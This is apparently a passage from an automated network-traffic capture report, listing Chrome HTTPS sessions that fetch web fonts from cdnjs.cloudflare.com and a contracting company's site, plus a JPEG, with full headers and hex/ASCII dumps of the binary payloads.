                                              2024-09-27 06:19:45 UTC1369INData Raw: 2e 78 12 27 71 03 8b 6f 44 70 11 85 82 b7 5b 59 7a 06 dd 76 37 6f e7 1b 14 59 1a 8d 77 97 c4 65 51 16 59 9a a5 3b 48 87 5b 55 16 e5 a0 5f 16 bd 89 27 25 33 64 50 75 35 17 86 e9 ba da ae f8 4e be bc c4 98 61 38 8b 5d 23 5e 48 c2 d8 53 9c 07 d5 c5 70 e1 5a 84 01 b5 c5 a5 48 59 16 e7 ae d2 95 38 aa e4 f5 c5 8d 7e 0b 39 8b 17 16 6a 89 56 9c 57 6b 8b 61 2c a5 87 a9 94 de 1a 33 0c 66 ba ae d6 82 33 66 18 10 ca 0d 7c 8b db be 0b 6e db 5a 2f d5 9b cb b5 9a 63 1b ab b1 5e bf 6d 08 21 b9 52 5a 99 96 25 38 37 b8 eb 56 2b 16 17 be 82 25 6d e5 39 42 da ac ed 49 49 af e2 35 9f 30 c6 38 ff ae 58 12 a1 18 e4 79 35 c1 e7 df 64 b7 84 48 b3 3c cd b8 e0 22 4e e2 a4 28 8b 12 73 5b 7f 5d 4a 47 6b 67 3e 1d 1f 0b c3 3b 50 ad d6 eb d5 2a e8 4d b6 de d3 d1 da 91 72 3e f5 60 0c e5
                                              Data Ascii: .x'qoDp[Yzv7oYweQY;H[U_'%3dPu5Na8]#^HSpZHY8~9jVWka,3f3f|nZ/c^m!RZ%87V+%m9BII508Xy5dH<"N(s[]JGkg>;P*Mr>`


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.465342104.17.25.144436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC668OUTGET /ajax/libs/font-awesome/6.2.1/webfonts/fa-brands-400.woff2 HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://www.citydiamondcontracting.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: font
                                              Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:19:45 UTC953INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Content-Type: application/octet-stream; charset=utf-8
                                              Content-Length: 107656
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: "6373d4a6-1a488"
                                              Last-Modified: Tue, 15 Nov 2022 18:04:22 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 514403
                                              Expires: Wed, 17 Sep 2025 06:19:45 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zCzYafKtp%2BAG5C6IJCsJ8oXMtrnIMxKgdsaPoRp39rh0%2BMbHK5ofkAU5rJ%2F96x4RmS2BMn%2BeHaLmHmCt3kaCcI1Q3aL333dDOru7A4I2%2Fo9UGXAVyF6%2FVAeGOHQDitZzmBhKyytq"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8c99624adda9c3f5-EWR
                                              2024-09-27 06:19:45 UTC416INData Raw: 77 4f 46 32 00 01 00 00 00 01 a4 88 00 0a 00 00 00 02 bf dc 00 01 a4 3e 03 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 90 08 00 a4 4c ca 8a b0 60 cb 90 0c 05 88 20 07 20 a5 ed 5f 51 77 00 65 d8 38 00 00 94 33 0f aa 48 4f 5a 2d 1e 00 55 d5 3a 31 b8 a9 1a 10 7e fa e5 b7 3f fe fa e7 bf bf 0a 8c dd 0d b1 8e eb f9 26 78 be ae 7f eb dc 99 37 e8 79 c6 37 22 74 28 77 00 2c c1 65 96 50 67 6f 4d e2 15 6d 22 ce bc 01 d7 ce 8f 98 38 0f 3c a8 24 a7 e9 b0 3c c8 ff 5f d8 b9 e5 12 fa 16 e0 99 2e f4 92 14 86 ff a7 71 7c e7 7e 33 af 9d dc c9 54 44 b4 75 22 38 6f de ac 8f de 69 f5 5d 2d a9 5b 2d 75 4b 96 25 75 1b e2 18 64 4b 09 5b 96 2d 4d 92 c9 c4 43 8b 30 bb 1c df dd e3 a5 39 62 1f 65 0f 00 fc 80 d8 8f e0 97 c0 0f 88 94
                                              Data Ascii: wOF2>8$ `L` _Qwe83HOZ-U:1~?&x7y7"t(w,ePgoMm"8<$<_.q|~3TDu"8oi]-[-uK%udK[-MC09be
                                              2024-09-27 06:19:45 UTC1369INData Raw: 1e 33 5e 9c 59 1b 67 66 8c bd 78 46 de 65 66 70 96 bc 78 8c 67 94 d6 2b 67 e4 80 fc ff 37 4b 2b 9f 72 84 52 b5 32 57 48 7f 84 10 c7 5f a5 ec b9 ef fd 30 fe ff 11 c6 8f cc 32 22 b3 ca 88 cc 82 11 99 05 23 32 0b 46 64 a1 23 ab 8a 9c ac 02 ba b7 40 b2 e7 14 48 ee 39 a0 d8 73 88 66 cf 1c 80 dd a3 64 64 15 cf d9 28 60 44 24 80 73 36 8a a4 11 09 8e c8 62 af 28 90 6d 80 9c 03 90 a3 d8 3d 8a ec 15 ad 76 0e d9 ec d1 d2 b0 76 d7 5b cf 5b 9f e8 6e 03 ec 9e 5d 7d fc 35 2c 47 0b d3 5b c3 db c7 68 06 de b6 8f 3e b1 90 d2 6f 15 e9 c8 d8 ce 65 8a b7 18 d3 ef 5f ae fc 52 bd 04 15 15 29 5b 66 16 4d 64 5a dd 7e e9 7b 9f 40 4f 08 18 5b 65 34 b2 49 b8 45 af c2 41 29 15 5d 89 4c 26 67 23 a6 df df fd 5a a2 fd 69 e2 56 60 18 f6 64 04 95 54 f1 e7 b3 d7 3f 7c 58 cf 26 bf 6a a5 ff
                                              Data Ascii: 3^YgfxFefpxg+g7K+rR2WH_02"#2Fd#@H9sfdd(`D$s6b(m=vv[[n]}5,G[h>oe_R)[fMdZ~{@O[e4IEA)]L&g#ZiV`dT?|X&j
                                              2024-09-27 06:19:45 UTC1369INData Raw: 3a e4 b8 ce 6f 9f e5 4b e1 ab ea ab e1 db ec 7b e0 7b e4 fb e4 16 77 3b bb 13 dd d9 ee 7c 77 b1 bb dc 5d ef 1e 77 4f ba 97 dc 3b ee 4b f7 8d 1b ec 86 fa 2b fb 6b f8 b7 f8 f7 f8 1f f8 5f f8 83 fd 51 81 00 80 ec c8 89 02 28 86 4a e8 8e 1e e8 a9 c9 3f 94 d6 f6 58 7b ee 07 16 0b 1f 16 7e e8 d2 e9 9f 74 bd f7 c5 e5 15 b3 f4 a5 01 34 90 86 d1 08 1a 49 e3 69 1a cd a2 f9 f0 86 6e 03 6d a1 6d 74 8a 2e d1 03 7a 46 91 f4 9d bc f4 9b e3 72 62 56 1c c4 c5 b8 38 97 e5 0a dc 90 bb 70 37 ee c9 83 79 18 4f e2 69 3c 8b 57 f0 4a 5e cd 6b 78 23 ef e6 fd 7c 88 0f f3 31 3e c7 b7 f8 35 7f 66 5b 3a 49 3f 19 27 53 65 a6 cc 93 85 b2 5c d6 cb 66 d9 2e 7b e4 94 5c 93 9b 72 47 ee ca 3d 79 20 cf e4 85 7c 95 60 89 90 1f f2 53 44 1c f9 6f e2 9a 44 26 b9 49 6f 72 9a dc 26 8f 69 0c 7f e6
                                              Data Ascii: :oK{{w;|w]wO;K+k_Q(J?X{~t4Iinmmt.zFrbV8p7yOi<WJ^kx#|1>5f[:I?'Se\f.{\rG=y |`SDoD&Ior&i
                                              2024-09-27 06:19:45 UTC1369INData Raw: 2b 60 08 83 c8 2b c9 6b 30 8c bc 0e b6 d8 06 91 77 90 77 e2 2f f2 1e f2 3e fc 43 de 0f 5b f4 1f f9 00 f9 20 fe 27 1f 26 1f 47 90 4f c3 08 8c 24 5f 27 df c4 28 f2 0b f2 5b 8c 25 7f 20 7f fc 12 af 9b 3f 63 49 1b 40 6d 3f a0 0d a4 f6 a6 8e e0 69 44 75 34 75 02 6d 3a ea 24 ea 64 da 2c d4 69 d4 19 b4 d9 a8 b3 f1 6c 6c 73 52 e7 51 17 d1 e6 a2 2e a1 ae a2 cd 4f 5d 43 5d 4b 5b 8c ba 81 ba 89 b6 04 75 0b 75 3b 6d 69 ea 4e ea 51 da f2 d4 e3 d4 0b b4 75 a8 97 a9 97 69 eb 52 af 51 af d3 d6 a3 de 04 25 6d 03 ea ad 12 af 50 6f 0f d1 36 a4 de a5 de a7 6d 44 7d 0c 43 b4 4d a9 4f a9 ef 69 9b 51 3f c1 16 db 8e d4 2f 54 8f b6 13 35 8c fa 87 b6 1b f5 1f 94 b4 7d a9 ff 4b 9c 41 d5 10 6d 3f 6a 04 35 86 b6 3f 35 11 b6 c9 18 86 0f 60 f8 60 da 21 0c 1f ca f0 29 69 47 30 7c 5a 86
                                              Data Ascii: +`+k0ww/>C[ '&GO$_'([% ?cI@m?iDu4um:$d,illsRQ.O]C]K[uu;miNQuiRQ%mPo6mD}CMOiQ?/T5}KAm?j5?5``!)iG0|Z
                                              2024-09-27 06:19:45 UTC1369INData Raw: 15 40 55 9c f9 d3 9c 19 34 9b 9b f3 da 40 fa ba c5 b1 d1 f9 0a 10 2c 50 1f 21 3f 4e 62 17 dc 73 fa 04 3c 01 38 78 d6 9b 7b 0b a8 78 95 99 8d 35 6a 0a ce f7 a6 93 77 67 33 21 0c 33 85 b9 cf 98 35 35 05 e7 36 d6 68 bb fc fd 37 7a 5a 05 b3 71 93 a6 b0 40 5b 08 f9 3d 17 dc be 3e 19 9f 80 08 fa 48 b4 34 51 37 3a 0e c8 8b 38 89 93 0f f5 6a eb b6 39 a8 bd 7d f1 d2 c6 26 86 cd f7 7c 7f ff 9b 9f a3 90 51 e7 a7 15 80 52 3d 98 d5 da 86 bf ce fa 16 e0 cd 8d 4b 17 b7 df cd 43 b7 ef 57 7e aa d6 eb 29 f5 d3 16 7a 6a b3 03 0e 10 f2 c7 45 9a 1f 41 ac 06 27 01 25 34 ea 45 1b 0a 41 ed 6d 90 2a cb 0b 7e fa a2 50 5d f0 94 31 e7 9f 42 46 dd 77 ca c3 38 01 48 e2 c3 7b 3b 8d a6 8b 0d 5d e7 9c 73 0a 4e eb de 76 10 00 04 41 fb ab 2a fb 5f 74 18 5b 52 f2 80 1f ba af 83 24 3e 3c 8c
                                              Data Ascii: @U4@,P!?Nbs<8x{x5jwg3!3556h7zZq@[=>H4Q7:8j9}&|QR=KCW~)zjEA'%4EAm*~P]1BFw8H{;]sNvA*_t[R$><
                                              2024-09-27 06:19:45 UTC1369INData Raw: ad b9 17 63 0e cc 3b e5 d2 93 f6 e2 c1 65 db 7c b1 cc d5 2d 6c c3 24 1b 96 a3 2e 3b 34 c4 e3 7a 65 c4 de 6a b1 5a 75 8e 58 40 02 bc 7c fe 67 1c c3 2c 1f 1c 7b a5 11 8a 5a f8 a8 7f 01 0e 63 c7 5b 61 f1 62 61 5e bd c4 9a 96 25 58 9b 17 79 80 ef 8d 94 34 00 f4 d4 6b 19 38 74 b6 57 9e a6 75 b4 bd cd df 7c c0 85 a8 4c e3 e3 3c 7a 6c 01 30 8b 0b 6b e7 04 66 b8 a5 0e fd e8 02 21 0e 62 cc d9 84 36 3f 2f 5c 30 21 2c 0b 80 6d 80 4c ce 6c 22 34 90 c6 c9 63 8c 2a 2b dd 49 e6 c4 f1 68 b7 42 d7 73 1c 70 8e 66 2a 80 a8 24 18 a6 e7 49 15 5d 26 57 f6 b1 8c 0f d8 a3 f5 1d c5 23 71 e9 b8 d2 d3 98 41 22 14 11 a2 21 42 13 35 d7 c8 9b 3a 8c 95 ee 4c 9c 73 cf b1 ef 64 80 10 8c 54 2a 43 2f 12 63 5f 52 69 01 5a dc c0 1b 17 79 06 1d 87 31 02 f3 3e 19 4b 88 80 d4 39 0f c6 04 da 16
                                              Data Ascii: c;e|-l$.;4zejZuX@|g,{Zc[aba^%Xy4k8tWu|L<zl0kf!b6?/\0!,mLl"4c*+IhBspf*$I]&W#qA"!B5:LsdT*C/c_RiZy1>K9
                                              2024-09-27 06:19:45 UTC1369INData Raw: 16 91 27 71 32 4e df 0e 33 26 1c 11 e8 dc ab f8 75 25 00 a2 30 24 75 85 01 00 fe b8 38 81 5a 63 bf d1 30 ad 8a 5b dd a1 e6 5a f3 78 b7 d1 d4 a0 e2 66 d4 b2 c1 b6 1d 87 01 58 ba ae 99 66 1c 52 c0 a0 6b 20 6c 51 f1 98 0e 18 3a dd a2 b8 f6 e4 d5 2b 2e 35 99 0e d3 dd c0 ab d2 ad 0e b4 a5 0c 9a 91 c4 10 f6 7a 3d b0 01 63 8c 01 c0 06 2c 55 c5 34 74 5c df dd 8d 07 a0 ad ad b5 b5 aa 8f c1 b6 0c 20 06 35 4d 0c 96 8e f1 fa ba df b0 c3 80 61 0c cc 16 f5 7a 5c 71 5d 7a ad 28 3a 5d c0 07 17 1e 9d 44 91 09 88 a1 ce f9 0a 27 b0 40 2e f2 51 07 1d a0 eb e8 6e f4 04 fa 4a f4 0c 42 78 9f 6d 50 34 4e e2 44 cb 26 51 21 5b 89 51 98 8d 8a bc 50 93 2c cc e8 9b 71 1b c2 4c 2a 42 a3 30 cb 8b 7c b2 0d 93 2c 8c c2 df 1b ab 24 a2 51 91 a9 a4 eb 75 47 35 30 2f f1 22 9c f6 9f 15 14 a1
                                              Data Ascii: 'q2N3&u%0$u8Zc0[ZxfXfRk lQ:+.5z=c,U4t\ 5Maz\q]z(:]D'@.QnJBxmP4ND&Q![QP,qL*B0|,$QuG50/"
                                              2024-09-27 06:19:45 UTC1369INData Raw: 5c 65 89 4c d3 ee 1e cd 02 df 47 8c a2 fe 38 4e 2c f8 7e 68 38 63 a9 63 2d d2 46 3e 4f 8c 09 ac 09 32 c6 e1 31 50 9e 54 68 3c b8 9f 02 80 31 ea e4 b6 3e 5d ad ae bf 7e 55 b3 91 56 7d 00 17 70 af 28 5c 44 4a 8d d8 de da df df dc a4 0b f8 49 16 31 c6 68 2f 91 a2 99 1f 33 ae 3b a5 14 83 fe 80 fe a5 67 b5 ef b7 d7 b2 8c 3a 0e 6e 83 d6 20 85 48 ad 72 dc 6c dc e9 70 a0 08 a7 28 03 34 9a 7f 67 d2 60 d6 31 94 11 42 0c 21 04 f0 18 be 82 f4 2c 79 31 c9 f3 d3 3f c0 05 29 09 19 57 cb 62 99 56 4b 5a 2d 0b 5e 2d 8b fc 77 5a 59 2d 0b 59 2d 8b 65 b5 2c e0 97 de fa 12 39 39 7c eb 5b bf e9 ad 6f fd e6 4f 7a 1d f8 d6 b7 fe e6 0d 4f 5d 7f fd c9 ff b8 e1 87 6e b8 93 9d d7 8c 84 20 69 5d fb 3c fc 37 f8 0c a1 64 4e 48 3d 9b ce b8 b8 da 05 7f 09 f6 cf 16 ab 7a 55 87 81 cd ac 5e
                                              Data Ascii: \eLG8N,~h8cc-F>O21PTh<1>]~UV}p(\DJI1h/3;g:n Hrlp(4g`1B!,y1?)WbVKZ-^-wZY-Y-e,99|[oOzO]n i]<7dNH=zU^
                                              2024-09-27 06:19:45 UTC1369INData Raw: 71 39 2a 27 f5 aa 97 b6 e3 08 16 cb c5 32 3f 24 e5 5f 28 51 a2 c3 61 b8 e9 6c 3a 9b 1f c1 aa 9c 94 f5 a8 10 3e 88 3c eb 17 d7 d0 5e eb fb 90 e4 6d 2d 22 26 bf 90 c2 b7 fc 2d 22 00 b0 ff 9e c5 b1 f2 fc ad ad e5 72 a7 ed 0e 47 23 89 74 bd dd 02 00 0a df cf 80 0a a3 e3 97 50 86 a0 85 31 d1 1c 01 90 55 69 1c 6b 46 3f 4d 81 c3 da da f2 0a 45 44 46 d1 f3 d2 11 02 c0 a9 7e 1f 60 bd 55 64 9e b7 ee ba d8 6e af 4b c9 98 4d 3d 17 5e 08 d8 4f 3d 17 28 22 32 0a be 97 6a 0a 34 0c 57 c5 1a 10 42 08 10 4e 08 fc 0c 5c 21 13 42 60 98 e4 59 9e e5 c1 d0 2d 70 c8 30 cb ab 5a e1 45 de 64 39 9d 0d 57 25 fc cc c9 8d ae 1b 0e 37 36 7a 3d bc 67 3f 89 22 73 f2 ef 6a fc 80 97 a6 cd 46 ab 99 26 8c c1 1d 02 e0 ca ad fb fb 83 e3 a2 f0 7c 18 5c 6e 4d 26 db fb fd 34 8a ad 69 36 ca cd 7e
                                              Data Ascii: q9*'2?$_(Qal:><^m-"&-"rG#tP1UikF?MEDF~`UdnKM=^O=("2j4WBN\!B`Y-p0ZEd9W%76z=g?"sjF&|\nM&4i6~
                                              2024-09-27 06:19:45 UTC1369INData Raw: 76 23 21 a5 88 12 ce 01 a4 08 3f e9 36 3b 9e eb 7a ed 86 3b 1a f4 02 29 01 94 f4 43 21 a5 08 7f 76 00 7e de 32 06 46 90 b7 61 a4 27 93 97 bd ee 75 df ff ec b3 af 7f fd 76 14 f6 7a 61 14 85 bd 5e 18 3d e3 38 7e 60 1d 00 c7 06 be e3 c8 04 20 4e 5a ad 38 82 e8 ec f7 3f 0d d6 09 7c c7 71 1c 3f 70 2c 3c 1d a5 9e 97 df 7c 5d 0f d6 ce dd 37 26 84 70 42 ae f1 b0 3a 29 a9 ae 3d 0f bf 33 46 5e 12 16 bc 94 bc 5a 96 61 5a ca 65 11 d6 79 58 dd 75 17 dc 70 e7 9d 6f f9 8a bb 7f fb 77 06 af da 3b 77 6e 0f 6e ff 8b 1b 6e f8 8b 93 6f 7e f3 9b e1 c5 51 15 f3 11 72 33 5e 81 17 93 26 29 c8 8c dc 4e 5e 40 5e 4d be 8b fc 26 21 f5 48 2e 91 cd 32 45 98 3b cb db 18 2e e4 a4 5c ae 6a c3 6b 6f 2f a5 6a eb 02 8c ba 07 a4 62 98 45 2b aa e7 42 ce 6c d1 56 03 ea 9b 77 80 d1 59 96 8f 47
                                              Data Ascii: v#!?6;z;)C!v~2Fa'uvza^=8~` NZ8?|q?p,<|]7&pB:)=3F^ZaZeyXupow;wnnno~Qr3^&)N^@^M&!H.2E;.\jko/jbE+BlVwYG


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.465337173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC687OUTGET /fonts/sora/Sora-Medium.woff2 HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://www.citydiamondcontracting.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: font
                                              Referer: https://www.citydiamondcontracting.com/css/yourstyle.css
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:45 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:21:42 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 24828
                                              Connection: close
                                              Content-Type: font/woff2
                                              2024-09-27 06:19:45 UTC7931INData Raw: 77 4f 46 32 00 01 00 00 00 00 60 fc 00 0f 00 00 00 01 18 58 00 00 60 99 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 78 1b 81 84 56 1c 96 78 06 60 00 87 16 11 08 0a 82 c1 60 81 f9 45 0b 88 0a 00 01 36 02 24 03 90 10 04 20 05 8e 7a 07 a0 02 1b 2a ef 47 30 3b 4c 5e f5 c0 e6 dc 10 28 4a 6b ab 4f 7f 7e 42 c5 d8 98 58 b7 de 6c 83 a8 ae df e7 2c 0a 01 e7 41 48 41 ff 70 c8 fe ff ff cf 49 1a 72 58 12 96 5c db 02 6c ff 30 62 2a 23 a2 f5 31 69 a3 aa aa 1e 6a 0d 19 0d a3 61 f2 86 a0 63 3f 70 f6 ab d0 6f 9c 18 f7 21 9e 05 1d d6 f5 29 b7 ea 96 9b e5 6b b9 5b da ca 57 e2 b5 e6 08 15 c7 d2 bb b4 a5 2d ed a5 57 3b 60 aa 3b f2 c6 77 a3 bb a8 84 e9 27 46 90 97 ab ce 2e aa bd ca 78 f0 35 37 cb a9 9b b6 b4 e5 4f 37 6a 18 3c f0
                                              Data Ascii: wOF2`X`?FFTMxVx``E6$ z*G0;L^(JkO~BXl,AHApIrX\l0b*#1ijac?po!)k[W-W;`;w'F.x57O7j<
                                              2024-09-27 06:19:45 UTC8000INData Raw: dc 3f bd eb 6d ff f6 b1 4f 03 94 28 85 42 47 39 85 00 b3 32 64 af 74 4e 1b e7 26 54 32 9d b6 02 96 da 3c ee 4b 9f 49 97 56 48 48 b6 02 2b d3 30 34 f0 47 1a ba de e8 72 7e 77 a3 b0 32 17 e5 9a af f5 a3 6f dd 8c 46 5f f5 1a 32 82 20 f8 8c 36 96 41 b6 6f bb 78 0b ee d5 5a b5 1e 2b 3f af 38 ae 81 1e 2d 30 64 8b 9c e9 36 1e ba 48 a7 60 8f c3 e0 c1 87 ba 4a bf b7 ff bf d7 75 62 04 3d 06 58 a3 a4 99 79 8e 32 bc c3 a1 74 55 4c ea b7 da 31 2f c2 6a 10 51 a2 ea c0 c3 c2 96 65 da ae 3f 4b fb 09 36 29 6e 4e f2 7c bb 23 ac 99 86 d9 8c dc ad e6 96 35 55 a5 b7 f4 e0 51 23 02 58 5f cf 5e f5 a4 16 6f 5e ea 05 96 ff 40 ff 7f ff 57 6b 9c e1 f2 fb 42 4f bd 96 f0 bd 1f 85 bf e3 21 c0 81 f3 00 cc 9e 35 40 d4 49 52 8f c6 1c 58 c3 93 34 e9 b0 cc 5d 58 30 fc f0 f0 fa 15 51 4a 59
                                              Data Ascii: ?mO(BG92dtN&T2<KIVHH+04Gr~w2oF_2 6AoxZ+?8-0d6H`Jub=Xy2tUL1/jQe?K6)nN|#5UQ#X_^o^@WkBO!5@IRX4]X0QJY
                                              2024-09-27 06:19:45 UTC8000INData Raw: 49 9d d8 fa 6a 85 13 08 48 83 1b 86 e7 7a 1c 96 16 ac c4 1b e2 cf 85 57 ad 9c eb f2 9f fd fc 53 77 5f 86 97 b5 cd 0d 77 cc 55 f0 0c ee 2e 69 96 dc b5 07 c1 23 a2 a5 c9 41 99 1f e0 8c 64 f2 d3 f5 ce fe 19 5e c0 f2 b5 44 54 da 20 1c be 82 44 40 13 48 3c f4 41 c4 71 ff fe 50 c6 f9 88 3f f0 5f 15 0e ad c0 a1 aa f0 28 c5 24 34 fd b7 f8 37 e9 0f e3 1d d3 04 db 65 6d 8d a1 f7 4b 2c cc ef 4c fd b1 d7 d0 68 fd 03 84 0e 6c 02 89 f7 59 b4 c8 fc f0 e0 cc 04 35 d7 b6 93 4a ab 40 34 a0 9c da 2d ba d4 6c 5e df 65 1f 02 ab 89 4e 61 62 80 8f 11 a8 3e ee 87 17 9c 58 de 7b 42 49 6a ab 97 19 2a 97 34 78 54 5c 4b b6 7f 57 ae c0 7d 20 16 46 e1 5a 9c 27 e0 d5 43 73 3d b6 b3 0b ee ad b7 d3 2c bc 72 e5 5c 97 5d da 9b 0a 6b 3c bc 14 ab 07 df e0 66 8d b7 c4 2b c2 8c 2b 48 3c 34 0f
                                              Data Ascii: IjHzWSw_wU.i#Ad^DT D@H<AqP?_($47emK,LhlY5J@4-l^eNab>X{BIj*4xT\KW} FZ'Cs=,r\]k<f++H<4
                                              2024-09-27 06:19:45 UTC897INData Raw: b6 ee 1e c0 ae 96 e9 f9 e6 fb e3 a4 30 c7 52 a3 7d 6e 19 d3 7b c5 12 ba 4f 25 67 45 b9 2b 83 66 05 30 33 cf be 53 76 2c 91 d9 19 c7 bc 5b e1 c7 30 16 ba 0d b3 bb ef 9c a8 bc 39 7d f5 39 60 3b 2e ad 02 de 59 46 b8 b2 19 d7 38 f0 fa c9 70 c6 4d df 18 7a 3c 28 d2 1c e7 20 6c 2f 0f ad 40 74 7b 3c a4 b1 05 19 0e 82 84 38 81 96 56 6c 49 1d 2b 79 c7 de cb de 66 b4 8c 12 76 32 a5 13 a5 fe 4b 24 fd b1 f5 f2 76 ac 8b 3c b4 50 5b 4b 90 17 a9 b5 95 5b 5a e7 41 7f 87 22 81 32 29 2b f8 63 98 39 5c 1e 7a de 8e cb 22 b1 5d 2c 41 19 d7 db e9 82 53 4a e7 bd d5 95 76 59 95 39 5d 29 b7 e0 56 ce 7a 2e b8 ee ab 2f 2a a6 2c b7 8c 2a 29 66 ce fc d2 be ae cd 6f c6 7d 09 be 4f d5 23 a1 df 15 2f 7f 2c 50 af 02 ac 37 ab e8 98 0d ab 34 ed 01 6e 94 76 d6 b3 3f 91 06 8d ae 15 bb d8 90
                                              Data Ascii: 0R}n{O%gE+f03Sv,[09}9`;.YF8pMz<( l/@t{<8VlI+yfv2K$v<P[K[ZA"2)+c9\z"],ASJvY9])Vz./*,*)fo}O#/,P74nv?


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.465339173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC721OUTGET /uploads/dynamic/11/a8f19a8ddc204498fd4867850bfee67c.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:45 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 14:51:03 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 44333
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:19:45 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Duckyd/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
